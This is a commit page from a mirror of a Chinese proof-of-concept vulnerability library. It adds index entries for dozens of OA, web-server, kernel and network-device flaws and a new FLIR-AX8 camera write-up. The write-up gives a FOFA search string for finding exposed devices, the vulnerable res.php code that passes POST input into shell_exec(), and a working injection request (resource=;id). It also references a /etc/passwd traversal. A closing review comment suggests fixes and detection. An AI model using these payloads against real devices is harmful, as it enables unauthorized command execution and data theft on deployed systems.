mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞库:网络设备漏洞/
parent
db8033eacb
commit
6819988d68
@ -66,13 +66,16 @@
|
||||
|
||||
* O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
|
||||
* 一米OA getfile.jsp 任意文件读取漏洞
|
||||
* 万户OA DocumentEdit.jsp SQL注入漏洞
|
||||
* 万户OA download_ftp.jsp 任意文件下载漏洞
|
||||
* 万户OA download_old.jsp 任意文件下载漏洞
|
||||
* 万户OA downloadhttp.jsp 任意文件下载漏洞
|
||||
* 万户OA DownloadServlet 任意文件读取漏洞
|
||||
* 万户OA fileUpload.controller 任意文件上传漏洞
|
||||
* 万户OA OfficeServer.jsp 任意文件上传漏洞
|
||||
* 万户OA showResult.action 后台SQL注入漏洞
|
||||
* 万户OA smartUpload.jsp 任意文件上传漏洞
|
||||
* 万户OA TeleConferenceService XXE注入漏洞
|
||||
* 信呼OA beifenAction.php 后台目录遍历漏洞
|
||||
* 华天动力OA 8000版 workFlowService SQL注入漏洞
|
||||
* 启莱OA CloseMsg.aspx SQL注入漏洞
|
||||
@ -90,6 +93,7 @@
|
||||
* 泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
|
||||
* 泛微OA E-Cology getSqlData SQL注入漏洞
|
||||
* 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞
|
||||
* 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
|
||||
* 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
|
||||
* 泛微OA E-Cology users.data 敏感信息泄漏
|
||||
* 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
|
||||
@ -312,6 +316,7 @@
|
||||
* 深信服 行为感知系统 c.php 远程命令执行漏洞
|
||||
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
|
||||
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
|
||||
* 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
|
||||
* 畅捷CRM get_usedspace.php SQL注入漏洞
|
||||
* 畅捷CRM 后台附件任意文件上传漏洞
|
||||
* 科达 MTS转码服务器 任意文件读取漏洞
|
||||
@ -385,6 +390,7 @@
|
||||
* Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
|
||||
* Jenkins CI 远程代码执行漏洞 CVE-2017-1000353
|
||||
* Jenkins script 远程命令执行漏洞
|
||||
* muhttpd 任意文件读取漏洞 CVE-2022-31793
|
||||
* Nginx越界读取缓存漏洞 CVE-2017-7529
|
||||
* PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
|
||||
* Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
|
||||
@ -412,6 +418,7 @@
|
||||
* Linux DirtyPipe权限提升漏洞 CVE-2022-0847
|
||||
* Linux eBPF权限提升漏洞 CVE-2022-23222
|
||||
* Linux kernel权限提升漏洞 CVE-2021-3493
|
||||
* Linux openvswitch权限提升漏洞 CVE-2022-2639
|
||||
* Linux Polkit权限提升漏洞 CVE-2021-4034
|
||||
* Linux sudo权限提升漏洞 CVE-2021-3156
|
||||
* Windows CryptoAPI欺骗漏洞 CVE-2020-0601
|
||||
@ -474,6 +481,7 @@
|
||||
* DVR 登录绕过漏洞 CVE-2018-9995
|
||||
* Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372
|
||||
* FLIR-AX8 download.php 任意文件下载
|
||||
* FLIR-AX8 res.php 后台命令执行漏洞
|
||||
* H3C SecPath下一代防火墙 任意文件下载漏洞
|
||||
* HIKVISION DSIDSIPC 等设备 远程命令执行漏洞 CVE-2021-36260
|
||||
* HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
|
||||
@ -514,6 +522,7 @@
|
||||
* TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
|
||||
* TP-Link SR20 远程命令执行
|
||||
* TVT数码科技 NVMS-1000 路径遍历漏洞
|
||||
* Untitled
|
||||
* Wayos AC集中管理系统默认弱口令 CNVD-2021-00876
|
||||
* Wayos 防火墙 后台命令执行漏洞
|
||||
* Wayos 防火墙 账号密码泄露漏洞
|
||||
|
||||
@ -18,6 +18,10 @@ app="FLIR-FLIR-AX8"
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
出现漏洞的文件为 **download.php**
|
||||
|
||||
```php
|
||||
@ -174,4 +178,4 @@ else
|
||||
/download.php?file=/etc/passwd
|
||||
```
|
||||
|
||||

|
||||

|
||||
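--- a/网络设备漏洞/FLIR-AX8 res.php 后台命令执行漏洞.md
+++ b/网络设备漏洞/FLIR-AX8 res.php 后台命令执行漏洞.md
@@ -0,0 +1,124 @@
+# FLIR-AX8 res.php 后台命令执行漏洞
+
+## 漏洞描述
+
+FLIR-AX8 res.php 文件存在后台命令执行漏洞,攻击者通过默认口令登录后台后获取服务器权限
+
+## 漏洞影响
+
+```
+FLIR-AX8
+```
+
+## FOFA
+
+```
+app="FLIR-FLIR-AX8"
+```
+
+## 漏洞复现
+
+登录页面
+
+
+
+出现漏洞的文件为 **res.php**
+
+```
+<?php
+if (isset($_POST["action"])) {
+switch ($_POST["action"]) {
+case "get":
+if(isset($_POST["resource"]))
+{
+switch ($_POST["resource"]) {
+case ".rtp.hflip":
+if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
+$result = "false";
+break;
+}
+$result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
+break;
+case ".rtp.vflip":
+if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
+$result = "false";
+break;
+}
+$result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
+break;
+default:
+$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
+}
+}
+break;
+case "set":
+if(isset($_POST["resource"]) and isset($_POST["value"])) {
+switch ($_POST["resource"]) {
+case "rtp.hflip":
+file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
+break;
+case "rtp.vflip":
+file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
+break;
+default:
+$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;
+}
+}
+
+break;
+case "measurement":
+if (isset($_POST["type"]) && isset($_POST["id"])) {
+$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"]));
+$lines = explode("\n", $nodeData);
+foreach($lines as $line)
+{
+$resource = preg_split('/\s+/', $line);
+$value = trim($resource[1], "\"");
+$result[$resource[0]] = $value;
+}
+}
+break;
+case "global-parameters":
+$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));
+$lines = explode("\n", $nodeData);
+foreach($lines as $line)
+{
+$resource = preg_split('/\s+/', $line);
+$result[$resource[0]] = $resource[1];
+}
+case "alarm":
+if(isset($_POST["id"]))
+{
+$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"]));
+$lines = explode("\n", $nodeData);
+foreach($lines as $line)
+{
+$resource = preg_split('/\s+/', $line);
+$value = trim($resource[1], "\"");
+$result[$resource[0]] = $value;
+}
+}
+break;
+case "calibrate":
+$result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");
+
+break;
+case "node":
+$nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"]));
+$result = preg_split("/\s+\n/", $nodes);
+break;
+}
+echo json_encode($result);
+}
+?>
+```
+
+验证POC
+
+```
+POST /res.php
+
+action=node&resource=;id
+```
+
+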
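Review bot: The write-up ends at the verification request and has no remediation or detection section, although the quoted res.php shows the root cause plainly: `$_POST["resource"]`, `$_POST["value"]`, `$_POST["type"]` and `$_POST["id"]` are concatenated into `shell_exec()` command strings in the `get`, `set`, `measurement`, `alarm` and `node` branches. I would add a `## 修复建议` section after the PoC stating that every request-derived argument must pass through `escapeshellarg()` or, better, be matched against an allowlist of resource-node names before it reaches the shell, that the default credentials must be changed, and that the management interface should not be reachable from untrusted networks. The listing as quoted contains no session or login check, so the "后台" (post-login) precondition cannot be confirmed from what is shown; the page should say where that check lives so defenders do not rely on a credential change alone. A short detection line would also help, noting that POST bodies to `/res.php` carrying shell metacharacters in these parameters are worth alerting on.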
0
网络设备漏洞/Untitled.md
Normal file
0
网络设备漏洞/Untitled.md
Normal file